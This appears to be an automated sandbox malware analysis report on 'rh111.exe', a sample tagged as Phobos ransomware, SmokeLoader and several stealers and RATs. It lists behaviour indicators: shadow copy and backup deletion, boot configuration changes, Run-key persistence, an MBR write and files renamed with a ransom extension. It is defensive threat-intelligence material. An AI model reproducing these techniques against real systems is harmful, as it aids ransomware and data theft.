Malware Analysis Report

2024-10-16 05:11

Sample ID 231001-v7xgascc2s
Target rh111.exe
SHA256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636
Tags ammyyadmin dcrat flawedammyy phobos rhadamanthys smokeloader backdoor bootkit collection evasion infostealer persistence ransomware rat spyware stealer trojan
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636

Threat Level: Known bad

The file rh111.exe was found to be: Known bad.

Malicious Activity Summary

SmokeLoader

Detect rhadamanthys stealer shellcode

Phobos

AmmyyAdmin payload

FlawedAmmyy RAT

Ammyy Admin

DcRat

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Deletes shadow copies

Modifies boot configuration data using bcdedit

Renames multiple (303) files with added filename extension

Deletes backup catalog

Downloads MZ/PE file

Modifies Windows Firewall

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Deletes itself

Drops startup file

Drops desktop.ini file(s)

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Adds Run key to start application

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Unsigned PE

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Uses Volume Shadow Copy service COM API

outlook_win_path

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious behavior: MapViewOfSection

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Runs ping.exe

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-01 17:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-01 17:38

Reported

2023-10-01 17:41

Platform

win10v2004-20230915-en

Max time kernel

100s

Max time network

165s

Command Line

C:\Windows\Explorer.EXE

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

DcRat

rat infostealer dcrat

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Phobos

ransomware phobos

Rhadamanthys

stealer rhadamanthys

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 444 created 3164 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\Explorer.EXE

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (303) files with added filename extension

ransomware

Deletes backup catalog

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ECAF.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ECAF.exe N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\X2MpkYv = "C:\\Users\\Admin\\AppData\\Local\\X2MpkYv.exe" C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\X2MpkYv = "C:\\Users\\Admin\\AppData\\Local\\X2MpkYv.exe" C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-1141987721-3945596982-3297311814-1000\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1141987721-3945596982-3297311814-1000\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence

Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\svchost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\TEMPSITC.TTF C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\CASCADE.ELM C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ThirdPartyNotices.MSHWLatin.txt C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Grace-ppd.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\hprof.dll C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jre1.8.0_66\bin\prism_common.dll.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL065.XML C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\rsod\office.x-none.msi.16.x-none.tree.dat.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_MAK-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.Edm.dll C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-file-l2-1-0.dll.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\Alphabet.xml C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\he.pak.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\PREVIEW.GIF C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\LyncVDI_Eula.txt C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL118.XML C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\it-IT\msader15.dll.mui C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\ta.pak.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial-pl.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Grace-ppd.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSVCP140_APP.DLL.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7FR.LEX.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\derby_common.bat C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ko.properties.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\AUDIOSEARCHLTS.DLL C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTest-ppd.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN089.XML C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_OEM_Perp-pl.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTrial-ul-oob.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\fi\msipc.dll.mui C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\PREVIEW.GIF.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\db2v0801.xsl.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\da.txt C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jre1.8.0_66\lib\security\java.security.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH.HXS.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\IACOM2.DLL.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ppd.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_OEM_Perp-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial4-ppd.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription4-pl.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_kor.xml C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hu-HU\tipresx.dll.mui C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Java\jre1.8.0_66\bin\keytool.exe.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul.xrm-ms.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql70.xsl.id[8BE9EB4B-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\certreq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\certreq.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Interacts with shadow copies

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
